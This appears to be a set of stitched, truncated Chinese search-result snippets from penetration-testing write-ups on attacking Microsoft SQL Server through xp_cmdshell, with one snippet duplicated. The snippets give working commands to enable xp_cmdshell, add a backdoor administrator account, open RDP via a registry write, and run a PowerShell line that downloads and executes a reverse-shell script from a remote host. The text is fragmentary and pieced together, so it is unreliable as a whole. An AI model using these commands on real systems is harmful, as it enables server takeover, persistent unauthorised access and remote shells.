master..xp_cmdshell'whoami' 尝试提权,添加新的管理员账户: exec xp_cmdshell'net user chanra521LoveYou/add' 似乎是mssql2019不能提权,尝试打开3389端口: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','...
1. XP_CMDSHELL 这个大家都比较熟悉了,通过xp_cmdshell来执行命令,可使用以下语句来执行: exec master..xp_cmdshell "whoami" 默认情况下xp_cmdshell 是禁止的,如下图: 这个时候,可以使用以下命令进行开启: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFI...
EXEC master..xp_cmdshell 'whoami' 将提供的反弹shell的脚本拖进HFS中: 导入powercat脚本来监听443端口,数据库执行系统命令,获得数据库服务器的shell: EXEC master..xp_cmdshell 'powershell "iex(New-Object Net.WebClient).DownloadString(''//192.168.159.10/Invoke-PowerShellTcpOneLine_443.ps1'')"' 先关闭de...
2、Mssql渗透 (1)Xp_cmdshell 使用sqlmap 直连数据库 sqlmap -d "db_type://user:pwd@ip:port/db" command 无法执行命令也没有回显,但是得到其版本为2000。 尝试连接数据库手动执行命令。 Navicat不支持连接Mssql2000,这里改用Database4来连接。 Mssql2005及以上版本默认关闭Xp_cmdshell,2000可以直接调用Xp_cmd...
EXEC master..xp_cmdshell 'whoami' 将提供的反弹shell的脚本拖进HFS中: 导入powercat脚本来监听443端口,数据库执行系统命令,获得数据库服务器的shell: EXEC master..xp_cmdshell 'powershell "iex(New-Object Net.WebClient).DownloadString(''//192.168.159.10/Invoke-PowerShellTcpOneLine_443.ps1'')"' ...